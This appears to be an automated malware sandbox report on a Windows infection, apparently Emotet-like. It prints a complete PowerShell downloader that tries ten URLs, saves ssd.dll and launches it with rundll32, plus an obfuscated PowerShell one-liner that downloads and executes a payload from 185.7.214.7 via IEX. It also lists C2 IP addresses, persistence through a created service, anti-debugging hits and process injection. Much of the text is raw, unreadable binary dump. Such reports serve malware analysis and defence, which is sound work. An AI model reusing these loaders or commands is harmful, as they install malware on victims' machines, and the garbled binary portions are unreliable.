Data received $path = "C:\Users\Public\Documents\ssd.dll"; $url1 = 'http://mecaglobal.com/qxim/TlDTjlxYAdwU/'; $url2 = 'http://2021.posadamision.com/wp-admin/gO7Qvfd1/'; $url3 = 'http://mymicrogreen.mightcode.com/pub/WwQe6kKVIsa/'; $url4 = 'http://mawroyalmedia.com.ng/l1o2x/mAgab05/'; $url5 = 'http://pokawork.com.ng/-/uLYqpe6E8FH2DkM/'; $url6 = 'http://ariesnetwork.co.uk/cgi-bin/QO5VMUFERLpCd/'; $url7 = 'http://clatmagazine.com/p8wl/714/'; $url8 = 'https://animalkingdompro.com/wp-includes/TjXLWDUyhJuvIsPR/'; $url9 = 'http://bitcoin-up.fomentomunivina.cl/assets/w82JxkF70pHiMXtSm/'; $url10 = 'https://cr.almalunatural.com/b/GbQllyWCCy4bJWG2PW/'; $web = New-Object net.webclient; $urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10".split(","); foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{} } Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;
Data received Æ^]‹Ax…Àt=ñt ‹jPÿ’¬ÃVèË÷ÿÿ‹ð…öuè’.‹‹Îÿ(‹Î^…Àuéæµé¶‹ÿU‹ìVW‹}‹ñ…ÿtƒÿt ƒÿÿtèX.ƒ=,½tòj誾€ƒ¾€~!ÿ5,½ÿ”„…ÿ~$ƒ¾€u‰†„ëÿ¶„ƒ¦€ÿ”„jè(ª_^]ƒyXt‹IX‹ÿ` 3À@ËÿU‹ìƒ}uèÖ-ˆƒ8t ‹‹‹È]ÿb]‹ÿU‹ìƒyXuè­-‹IX‹]ÿ`‹ÿU‹ì‹Á‹M…Éuè‘-ˆƒ8u‹jÿë ‹‹Q‹ÈÿR ]‹ÿU‹ìƒyXt ‹IX‹]ÿ`03À]‹ÿU‹ì‹E…À|;A|èA-‹I]‹A jjjÿp ÿ„ËÿU‹ìV‹ñ‹ŽˆW…Éuè -‹Eºá;Ârï‹yú;Çs捸ðÿÿWè”ÿÿÿ‹‹P‹Îÿ’ˆ…Àu ‹Žˆ‹Wÿ3À_@^]Âèó;‹€ìÃjhèÕ3ۉ]àEàPèŠAÿ°€èï9‰E܉]ä;Ãu3Àë'‰]üÿuÿuÿu ÿuÿ˜„‰EäÇEüþÿÿÿè ‹EäèõÔÃ3ۃ}Üt.3À9]ä”À‹ð;ót ÿ,‚‹øë3ÿÿuàSèr9;ótWÿx‚ËÿU‹ìVèFõÿÿ‹ð…öt%‹‹Îÿ(…Àt†€ƒ8t ‹ÿu‹‹ÈÿRd^]ËÿU‹ìS‹x„V‹uW…öuè ÿÿÿ…Àu èõôÿÿ…Àu3öë‹p ëjðVÿ¤„©@t VÿӋð…öuç‹þ‹Æ…öt P‹øÿӅÀu÷ƒ}u …öt Vÿ „‹ð‹] …Ût#…ÿtWÿœ„…Àt;þt jW‰;ÿ „ëƒ#_‹Æ^[]‹ÿU‹ìÿuèÿÿÿY]‹ÿU‹ìì¡°d3ʼnEü‹E SVW‹}3öV‰…äþÿÿèéþÿÿY…ôþÿÿPVèÿÿÿ‹Ø‰èþÿÿ;ôþÿÿt jSÿ „!µìþÿÿ…ìþÿÿPSÿ¨„…Ût&ÿ(‚9…ìþÿÿujjhvSÿ„…Àt‹ðë…ÿtwxƒ¥ðþÿÿ…öt‹‰…ðþÿÿ‹E…Àt‰öEðu‹EƒàƒøvƒÀýƒøw ƒM ëƒM0ƅøþÿÿ…ÿt‹_P덝øþÿÿ¿W‹ÃPjÿD‚;ÇuÆEûÿuSÿµäþÿÿÿµèþÿÿè^ýÿÿƒÄ‹ø…öt‹…ðþÿÿ‰ƒ½ôþÿÿtjÿµôþÿÿÿ „jèÆýÿÿY‹Mü‹Ç_^3Í[èô¢ÉËÿU‹ìè·>‹@…Àt ‹‹È]ÿ¢˜ÿuÿu ÿujèsþÿÿƒÄ] ‹ÿU‹ìÿuÿu ÿuQèXþÿÿƒÄ] j¸>rèºËMðèÂ×ÿÿÿuƒeüMðè³Øÿÿ‹Eƒøÿu‹E‹uðPÿu VèwÿÿÿNð‹øèÑÏÿÿ‹ÇèRÌ ƒyXu3ÀËIX‹ÿ`‹ÿU‹ìƒyXuè)‹IX‹]ÿ`‹ÿU‹ìƒ}u3À]Ã]éDÓ‹ÿU‹ì‹EV‹ñƒøÿu ‹ÿpøPèÐÿÿÿYYP‹ÎèóÞÿÿ^]‹ÿU‹ìQ‹S‹] V‹pôW‹}+ø‰Mü…Û} hW€è—Íÿÿÿuè¿Ýÿÿ;ØY~‹Ø¸ÿÿÿ+Ã;Æ|܋MüP‰E èNÞÿÿ;þwøë‹}SWÆSP聬‹MüƒÄÿu èzÞÿÿ_^[É‹ÿU‹ì‹E‹VW‹ù‹7Hðƒî;Ît0ƒ~ |‹;uSQè–áÿÿY‹Î‹Øè¬ÎÿÿƒÃ‰[ë ÿpô‹ÏPèéßÿÿ‹Ç_^]Âj¸=bè5Ê‹uƒeð‹Îè‡Úÿÿ‹MPè^Úÿÿ‹ÿpôƒeüPÿu ÇEðèåÜÿÿYPÿu ÿuèøÜÿÿ‹EƒÄèÅÊËÿU‹ìVÿu‹ñè¼ÜÿÿYPÿu‹ÎèÂþÿÿ^]‹ÿU‹ìVÿu‹ñè(ÿÿÿ‹Æ^]‹ÿU‹ìVÿu‹ñè¸ÿÿÿ‹Æ^]‹ÿU‹ìVÿu‹ñèÙÿÿÿ‹Æ^]Âh$¸ybèÊ‹E ‹uPÜþÿÿ‰µÔþÿÿè/Ûÿÿ3ÿ‰}üþ€uQèÔ4ƒøuG…ÜþÿÿP…àþÿÿh؊PèïþÿÿƒÄ PÜþÿÿÆEüèŠþÿÿ‹àþÿÿƒÁðÆEüè[ÍÿÿDžÔþÿÿ€…ØþÿÿPÿµÜþÿÿÿµÔþÿÿÿ €‹ð;÷…¾h…äþÿÿPWÿµØþÿÿÿ€‹ð;÷uo…äþÿÿPàþÿÿÆEüèùÔÿÿ…àþÿÿPÿµØþÿÿÆEüè ÿÿÿ‹àþÿÿ‹ð;÷•ÃƒÁðÆEüèÊÌÿÿ„Ûu&‰}ü듋ÐþÿÿDžàþÿÿè%¸ºE˵àþÿÿþtþòuÿµÜþÿÿÿµÔþÿÿÿ€‹ðÿµØþÿÿÿ €‹ÜþÿÿƒÁðèbÌÿÿ‹ÆèÉÂh$¸ÂbèbÈ3ÿ‹ñ‰½àþÿÿ‰½Ôþÿÿèmüÿÿ‰…Øþÿÿ;Çt&…ØþÿÿP‹Îèfüÿÿ;Çt ‹WWjüW‹ÈÿR 9½ØþÿÿuÚ9~T„ 3À9~h•À;Çuè]%hðŠäþÿÿèÚÓÿÿÿvTäþÿÿ‰}üèýÿÿh슍…äþÿÿP…ÐþÿÿPèaÕÿÿÿvhÆEüP…ÜþÿÿPèMÕÿÿƒÄ‹ÐþÿÿƒÁðÆEüèˆËÿÿ…ÜþÿÿP¾€Vè ýÿÿ…àþÿÿPÿµäþÿÿVÿ €…Àu9h…èþÿÿPWÿµàþÿÿÿ€=u …äþÿÿPVè[ýÿÿÿµàþÿÿÿ €…ÔþÿÿP…èþÿÿPÿµÜþÿÿVÿ€‹ÜþÿÿƒÁðèüÊÿÿ‹äþÿÿƒÁðèîÊÿÿ3À@è‚ÇËÿU‹ìÿuÿuÿu ÿuèX¨PèÒìÿÿƒÄ]ÅÀué.$3Ò¹ÿÿf9H”‹ÂËÿU‹ìSV‹u‹‹ÆèÓÿÿÿ…Àt‹^ NëNWºÿÿ‹új^f99uƒÁë f‹9Îf…ÿuö_f9uƒÁë f‹Îf…Òuöf‹Îf…ÒuööÃ@t3҅À•ÂT Qf‹Îf…ÀuöA^ƒàü[]‹ÿU‹ìƒ} ‹EtƒÀëƒÀ¹ÿÿ‹Ñf9uƒÀë f‹@@f…Òuöf9uƒÀë f‹@@f…Éuö·@@f…Ét ƒ} uÁþÿ·ÉDƒàü]‹ÿU‹ìÿu‹Mÿuÿu èóµ]‹ÿU‹ìƒì S‹] VW‹Ã‹ñèÃþÿÿ…ÀCuC·@PjèJÍ‹}YY‰G…À„ã‹PS‹ÎÿRS‰Eô‰è£þÿÿ‹ð‹Ãè€þÿÿ‰Eü‹Ãèvþÿÿ…ÀCuC·3ÉjZ‹Ã÷âÁ÷Ù ÈQèPßÿÿ‹ËÁáQjP‰G èVÀƒeƒÄ‰_…Û~pÿuüVèÎþÿÿ‰Eø‹EÁàƒ}üt‹O ‹V‰N‹vë·N‹W ‰ N‹6ºÿÿf9uº€f9Qu‹Îƒá€ù u3ÉAë3ÉÿE9]‹W ‹uø‰L|‹Eô…Àu‹E _^[É‹ÿU‹ìV‹u‹…ÀtPÿ ‚‹F…ÀtPèF Yÿv è³ÞÿÿY^]‹ÿU‹ìƒìSV‹uWVè‡ýÿÿ‹ø‰}ð+þ‹Æ‰}üè\ýÿÿ‰Eø‹ÆèRýÿÿ…ÀFuF·ƒeô‹uð‰Eì…À~7‹ØÿuøVèÏýÿÿƒ}øNuNfƒ9{u ÇEôë‹È+ÎMüK‹ðuÐ9]ôu ‹E ƒ
Data received UÈRjjh¤Íÿ·œPÿQ‹Eä‹PÿQƒ§ˆƒ}Œt ÿuŒÿÀ‚ƒ}t ÿuÿÀ‚ƒ}”t ÿu”ÿÀ‚ÿEìƒEèƒMüÿE¸Pÿð‚ƒ}à…ÛþÿÿÿEð‹Eð;FŒ þÿÿƒfD3À蠗Ãj ¸!n軖‹ñ‰uèÇĤ‹F 3ÛÇEü;Ãt9plu‰Xl‹Ž;Ëtjè÷ÿÿ‹Îèئÿÿÿv`F@P‹Îè÷¢ÿÿÿvd‹ÎhTÏèè¢ÿÿÿ¶Œ‹ÎhäÍèÖ¢ÿÿ‹F\;Ãt ‹PÿQ‰^\‹FT;Ãt‹PÿQ‹FT‹PÿQ‰^T‹FX;Ãt ‹PÿQ‰^X‹FP;Ãt‹SPÿQ ‹FP‹jPÿQ‹FP‹PÿQ‰^P†¬Pÿð‚†”‹8;ût(‹O‰‹G ;Ãt9˜t ‹ˆ‹SWÿPWèk°þÿY9žœt‹†˜;Ãt9t ‹‹SV‹ÈÿR‹F ;Ãt9^ttÿHt‰]ìUìR†Ø‹¿ÎWPÆEüÿ;Ã|ÿuìèq-‰]ðUðR†Ü‹WPÆEüÿ;Ã|ÿuðèN-‹EðÆEü;Ãt‹PÿQ‹EìÆEü;Ãt‹PÿQŽ¼ÆEüèkI‹Ž¤ƒéèC™þÿƒMüÿ‹Îè³þÿ軕ËÿU‹ìV‹ñèþÿÿöEtV聯þÿY‹Æ^]‹ÿU‹ì‹U…Òu3Àë‹M …Éu3Àë‹AQPh‡ÿr ÿ„]‹ÿU‹ì‹E‹H…Étÿu è/£ÿÿ…Àt3À@]Ã3À]ËÿU‹ìV‹u…öt‹F…Àt‹H$ë‹…ÉtQÿœ„…Àu3À^]ÅÀt‹È‹ÿPx©ué‹v…ötâ÷Fp tÙ3À@ë֋ÿU‹ì‹E…Àu]ËHP…Ét]鍟ÿÿjPè1ÿÿÿƒà0]ËÿU‹ì‹E…Àt‹@ ÿu Pÿq ÿL„Pè¾3ÿÿ]‹ÿU‹ì‹E…Àt‹@ Pÿq ÿXƒ]‹ÿU‹ìV‹ujVèØþÿÿ¨tjÿjh±ÿv ÿ„‹Îèµbÿÿ^]‹ÿU‹ìSV‹u 3ۅötAW‹=¤„jðÿv ÿ×%À=@u&;ut!ÿv ‹Þÿx„Pè*3ÿÿ‹ðjìÿv ÿשtÇ_^‹Ã[]‹ÿU‹ìV‹u W…ö„ƒj‹Îèdÿÿ‹}ë)ÿv ÿx„Pèâ2ÿÿPWèqÿÿÿ‹ð…öt\;÷tXj‹Îèïcÿÿ…ÀtÓj‹Îèâcÿÿ‹ðjìÿv ÿ¤„©tSS‹]öÃt ÿv ÿ̄…ÀtöÃt,‹Îè‰aÿÿ…Àu!SVWë ‹}ÿw ÿ€ƒPèj2ÿÿ‹ð…öu«‹ÇëSjVèFÿÿÿ‹ð[‹Æ_^] ‹ÿU‹ìS‹]…ÛtcV‹Ã3öW‹xL…ÿu‹pP…öuÿp ÿx„Pè2ÿÿ…Àu߅Àt6…ÿu2‹‹Îÿ°ÿ|„Pèú1ÿÿ;Ãtÿs ÿD„…Àt _^‹Ë[]é$aÿÿ_^[]ËÿU‹ìV‹u…ötoÿv ÿD„…ÀtbW‹} ;÷tY‹Æ‹pL…öuÿp ÿx„PèŸ1ÿÿ…Àuæë;‹Vh3À…Òt9Btu ÿr$èƒ1ÿÿ…Àt!…ÿt…Àt;øtW‹Èè±ýÿÿ…Àu ‹j‹ÎÿP`_^]ËÿU‹ìW‹}ÿu ‹Ïèí^ÿÿ…Àu:SjPWè(þÿÿ‹Ø;ßu3Àë%V‹ó‹Îè§_ÿÿ;E tjVWèþÿÿ‹ð…öt;óuá3À^[_]‹Æëõ‹ÿU‹ìV‹u‹NP…Ét ÿu 觜ÿÿë2jVè*üÿÿ‹M ÷ÙɃáƒÁ…Át3À9E j•ÀPhôÿv ÿ„^]ËÿU‹ìV‹u W…ötjìÿv ÿ¤„©u Vÿuèýÿÿë jjÿuèiýÿÿ‹ø…ÿt!‹÷jVèjÿÿÿYYjVÿuèLýÿÿ‹ð…öt;÷uá_^]‹ÿU‹ì‹Ejjhÿp ÿ„‹ÈÁéºKSf;Êu·Àë3À@]‹ÿU‹ìQƒeüS‹]W‹}W‹ËèDüÿÿ…À„º…ÿt jìÿw ÿ¤„©… WèÎûÿÿY‰Eü‹E V;Çu8öEü „ƒ…Àt%SèiÿÿÿPSèUþÿÿ‹ð…öt;÷tVè—ûÿÿY¨tVëjWëN…Àt Pè€ûÿÿY…Àu …ÿt ƒ}ütWSèÁþÿÿöEü0uÕSèÿÿÿPSèþÿÿ‹ðVèOûÿÿY¨ t‹ÎèO^ÿÿ…Àt jVè?þÿÿYY^_[É ‹ÿU‹ì‹Mèÿÿ…Àt?‹HDVW‰M…Ét/‹u x@EP‹ÏèxÌþÿ‹‹H…Ét‹I$;N t‹;N tƒ}u×3À_^]‹ÿU‹ìSVW‹}…ÿuèžìþÿ‹] ƒe‹ó…ÛtJ‹C…Àt‹@$ë‹…Àt8Pè©.ÿÿPWè8ûÿÿ…Àt'PWèaÿÿÿ‹ðëÿE;ót#ƒ}<ÿuVèûùÿÿYY…ÀuMV‹Ïè•fÿÿ‹ð…öu֋ÏèÖÿÿ‹ø…ÿ„À‹OD‰M…Ût+3À…É„¬;Ãt-EPO@è¤Ëþÿƒ}‹uèë‹Æ鍍EPO@è‡Ëþÿ‹‹Ãƒ}tu…Àtq…Ûtmƒ}u‹GD‰EEPO@è]Ëþÿ‹0ÿuVè`ùÿÿYY…Àt@…öt‹F…Àt‹@$ë‹…Àt Pÿœ„…Àu‘ëƒ~„Üþÿÿ‹N‹ÿPx©„rÿÿÿ;óu“3À_^[] ‹ÿU‹ìQƒeüSVWÿu ÿuèAþÿÿ‹ø…ÿuK‹MèÝÿÿ‹Ø…Ût=‹CD‰E …Àt3E PK@è½Êþÿ‹0‹F…Àt;Cptƒ>t ÿ|„9tƒ} uÑë‹þ3öÿuWÿuè6þÿÿ‹ø3Û;ûtjWè¬øÿÿY…Àt‹MSWèâ^ÿÿ‹ø;ûtO;ût!‹G;Ãt‹@$ë‹;ÃtPÿœ„…Àt‹Çë,9_t.‹O‹ÿPx©tè;}üt9]üu‰}üFþ|‚3À_^[É èhêþÿÌj(¸<nèˌ‹E…Àu!EÔë‹@ ‰Eԋ} ‹w‰uäÿ|„P‰EÐèa,ÿÿ»‰Eì;órþ vÆþÿÿƒþ ‡¯…À„§‹=x„‹ðƒ~Pu!ÿv ÿ×Pè,ÿÿ;Etÿv ÿ×Pè ,ÿÿ‹ð…öuمöt#‹FP…ÀtƒxXt‹@Xÿu ‹PÿQ…Àu@鵁}ät9]ät }äu7…öt3‹vP…öt,‹E ·@fƒø u ö†„ufƒøuö†„t3Àég‹} ÿ73ö‰uèèƒ+ÿÿ!u؉Eà‹Eä+ÃÇEÜ„€HHt*ƒè…ª9EìujÿȄf…À”fƒ „‰Wÿuàè€öÿÿ}äu¨„us·Ofƒù u¨uefƒù „vÿÿÿWÿuàÿuètýÿÿ…ÀtK‹@…ÀtDW‹Èèjšÿÿé·Wÿuàè.öÿÿ·Oƒù8„Šƒù„ƒù „šƒù „;‹E÷@<u5ÿu ÿp ÿHƒ‰Eè…Àt"‹5|„ÿÖPè‡*ÿÿ;EìtÿÖPèz*ÿÿPè(øÿÿYÿuЋ5D„ÿօÀt6‹=|„ÿ×PèV*ÿÿPÿuìètøÿÿYYÿuÔÿօÀtÿ×Pè:*ÿÿPÿuìÿuèúÿÿ‹Eèè ‹Â¨…gÿÿÿjÿȄ‹u3Ûf…ÀœÃ‹ÎSjèå[ÿÿ…À„Bÿÿÿƒxt‹@‹W‹Èÿ’¬é©‹…ÀtPèÑ)ÿÿë Sÿuà‹ÎèxÚþÿ‹ø…ÿ„†‹FL
Data received ¯„ŸÂ+€Ÿ‹ |Ÿ¯ ˆŸ+Á+ˆŸ€Ÿ+|Ÿ„ŸˆŸ‹|Ÿ¯€Ÿ+Â+xŸ‹ €Ÿ¯ €Ÿ+Á+|Ÿ‹|Ÿ¯„Ÿ¯ˆŸ¯„ŸÂ+€Ÿ‹ |Ÿ¯ ˆŸ+Á+ˆŸ€Ÿ+|Ÿ„ŸˆŸ‹|Ÿ¯€Ÿ+Â+xŸ‹ €Ÿ¯ €Ÿ+Á+|Ÿ‹|Ÿ¯„Ÿ¯ˆŸ¯„ŸÂ+€Ÿ‹ |Ÿ¯ ˆŸ+Á+ˆŸ€Ÿ+|Ÿ„ŸˆŸ‹|Ÿ¯€Ÿ+Â+xŸ‹ €Ÿ¯ €Ÿ+Á+|Ÿ‹|Ÿ¯„Ÿ¯ˆŸ¯„ŸÂ+€Ÿ‹ |Ÿ¯ ˆŸ+Á+ˆŸ€Ÿ+|Ÿ„ŸˆŸ‰Eø‹„ŸkÒH‹Eô‹H +ʋ„ŸkÒHÊ¡€Ÿ¯|Ÿ¯ˆŸ¯|ŸkÀH+ȋ„ŸkÒHÊ¡„Ÿ¯€ŸkÀHȋ„ŸkÒH+Ê¡€ŸkÀH+ȋ€ŸkÒH+Ê¡ˆŸkÀH+ȋ|ŸkÒHÊ¡xŸ¯|ŸkÀH+ȋxŸkÒH+Ê¡|ŸkÀH+ȋxŸkÒHÊ¡xŸ¯xŸ¯ˆŸ¯ˆŸkÀHȋ€Ÿ¯xŸkÒHÊ¡ˆŸkÀHȋ„ŸkÒH+Ê¡„ŸkÀH+ȋˆŸkÒH+Ê¡ˆŸkÀH+ȉMü‹MQ‹Uü‹B0Pè øÿÿƒÄ…Àu ‹Mü‹Aék‹Uü‹‰Eü‹Mø+ |Ÿ+ „Ÿ‹ˆŸ¯ˆŸ+Ê+ xŸ+ xŸ¡xŸ¯€Ÿ+È+ xŸ+ „Ÿ |Ÿ‹„Ÿ¯€Ÿ¯xŸ „ŸÑ„ŸxŸ¡„Ÿ¯xŸ¯€Ÿ+ÐxŸ+|Ÿ+„Ÿ‹ ˆŸ¯ ˆŸ+Ñ+xŸ+xŸ¡xŸ¯€Ÿ+Ð+xŸ+„Ÿ|Ÿ‹ „Ÿ¯ €Ÿ¯ xŸ„ŸÊ „Ÿ xŸ‹„Ÿ¯xŸ¯€Ÿ+Ê xŸ+ |Ÿ+ „Ÿ¡ˆŸ¯ˆŸ+È+ xŸ+ xŸ‹xŸ¯€Ÿ+Ê+ xŸ+ „Ÿ |Ÿ¡„Ÿ¯€Ÿ¯xŸ „ŸÁ„ŸxŸ‹ „Ÿ¯ xŸ¯ €Ÿ+ÁxŸ+|Ÿ+„Ÿ‹ˆŸ¯ˆŸ+Â+xŸ+xŸ‹ xŸ¯ €Ÿ+Á+xŸ+„Ÿ|Ÿ‹„Ÿ¯€Ÿ¯xŸ„ŸÐ„ŸxŸ¡„Ÿ¯xŸ¯€Ÿ+ÐxŸ+|Ÿ+„Ÿ‹ ˆŸ¯ ˆŸ+Ñ+xŸ+xŸ¡xŸ¯€Ÿ+Ð+xŸ+„Ÿ|Ÿ‹ „Ÿ¯ €Ÿ¯ xŸ„ŸÊ „Ÿ xŸ‹„Ÿ¯xŸ¯€Ÿ+Ê xŸ+ |Ÿ+ „Ÿ¡ˆŸ¯ˆŸ+È+ xŸ+ xŸ‹xŸ¯€Ÿ+Ê+ xŸ+ „Ÿ |Ÿ¡„Ÿ¯€Ÿ¯xŸ „ŸÁ„ŸxŸ‹ „Ÿ¯ xŸ¯ €Ÿ+ÁxŸ+|Ÿ+„Ÿ‹ˆŸ¯ˆŸ+Â+xŸ+xŸ‹ xŸ¯ €Ÿ+Á+xŸ+„Ÿ|Ÿ‹„Ÿ¯€Ÿ¯xŸ„ŸÐ„ŸxŸ¡„Ÿ¯xŸ¯€Ÿ+ÐxŸ+|Ÿ+„Ÿ‹ ˆŸ¯ ˆŸ+Ñ+xŸ+xŸ¡xŸ¯€Ÿ+Ð+xŸ+„Ÿ|Ÿ‹ „Ÿ¯ €Ÿ¯ xŸ„ŸÊ „Ÿ xŸ‹„Ÿ¯xŸ¯€Ÿ+Ê xŸ9Mü…uûÿÿ3À‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì(‰M؋E‹H‰MðÇEô‹U‹€‰Eø‹Møƒyu ¸éå‹Uø‹Eð‰Eüë ‹MüƒÁ‰Müj‹UüRÿ„‚…À…¸‹Eüƒx „«‹M‹Q(R‹Eü‹MðH Q‹U‹BÿЃÄ‰Eàƒ}àuj~ÿx‚ÇEôér‹M‹Q •P‹M‹QRèMòÿÿƒÄ‰Eèƒ}èu*‹E‹H(Q‹UàR‹E‹H$ÿуÄjÿx‚ÇEôé"‹U‹Eè‰B‹M‹Q ‹E‹H‹Eà‰‘‹M‹Q ƒÂ‹E‰P ‹Müƒ9t‹Uü‹Eð‰Eä‹Mü‹UðQ‰Uìë‹Eü‹MðH‰Mä‹Uü‹EðB‰Eìë‹MäƒÁ‰Mä‹UìƒÂ‰Uì‹Eäƒ8tx‹M䋁â€t(‹E‹H(Q‹Uä‹%ÿÿP‹MàQ‹U‹B ÿÐƒÄ ‹Mì‰ë-‹Uä‹Eð‰E܋M‹Q(R‹E܃ÀP‹MàQ‹U‹B ÿÐƒÄ ‹M쉋Uìƒ:u ÇEôëénÿÿÿƒ}ôu ‹E‹H(Q‹UàR‹E‹H$ÿуÄjÿx‚ëé+þÿÿ‹Eô‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌU‹ìjÿh¾sd¡PQ¡°d3ÅPEôd£‰Mð‹EPjf‹MðèÐ ýÿÇEü‹MðÇ$Øh€è¢¾üÿ‹Èè›Àüÿ‹Uð‰BtÇEüÿÿÿÿ‹Eð‹Môd‰ Y‹å]ÂÌÌÌÌÌÌÌÌÌÌU‹ìjÿh td¡Pƒì ¡°d3ÅPEôd£‰Mè‹Mèèÿ ýÿj‹Mèè¿üÿ‰Eðƒ}ðt]MìèUÅüÿÇEüjeMìèDÆüÿMìè,Èüÿ¶À…Àu&jjh‹Mðèt¾üÿMìèüÇüÿPjj‹Mðè_¾üÿÇEüÿÿÿÿMìèÀÅüÿj‹Mè‹QtR‹Mèè¿üÿj‹Eè‹HtQ‹Mèèþ¾üÿ¸‹Môd‰ Y‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì`‰M ÇE¼ÇEðj@‹E P‹M è[Ôÿÿ…Àu3Àéê‹M‰Mô‹Uô·=MZthÁÿx‚3ÀéÅ‹Mô‹Q<ÂøR‹E P‹M èÔ
Data received
Data sent GET /PP91.PNG HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
Data sent GET /qxim/TlDTjlxYAdwU/ HTTP/1.1 Host: mecaglobal.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
process rundll32.exe
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2256 CREDAT:145409
host 103.8.26.102
host 103.8.26.103
host 104.168.155.129
host 131.100.24.231
host 178.63.25.185
host 178.79.147.66
host 185.7.214.7
host 192.254.71.210
host 203.114.109.124
host 207.38.84.195
host 209.59.138.75
host 212.237.17.99
host 217.182.143.207
host 45.142.114.231
host 45.176.232.124
host 46.55.222.11
host 51.38.71.0
host 51.68.175.8
host 58.227.42.236
host 79.172.212.216
service_name lblzasgj.kjy service_path C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy",iwpn
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 2
password:
display_name: lblzasgj.kjy
filepath: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy",iwpn
service_name: lblzasgj.kjy
filepath_r: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy",iwpn
desired_access: 2
service_handle: 0x005beb80
error_control: 0
service_type: 16
service_manager_handle: 0x005b3e28
1 6024064 0
parent_process iexplore.exe martian_process powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

send

 buffer: GET /PP91.PNG HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
socket: 1192
sent: 69
1 69 0

send

 buffer: GET /qxim/TlDTjlxYAdwU/ HTTP/1.1 Host: mecaglobal.com Connection: Keep-Alive
socket: 1216
sent: 82
1 82 0
parent_process iexplore.exe martian_process powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
file C:\Windows\SysWOW64\Kgeyspeml\lblzasgj.kjy:Zone.Identifier
Process injection Process 2256 resumed a thread in remote process 2404
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000358
suspend_count: 1
process_identifier: 2404
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
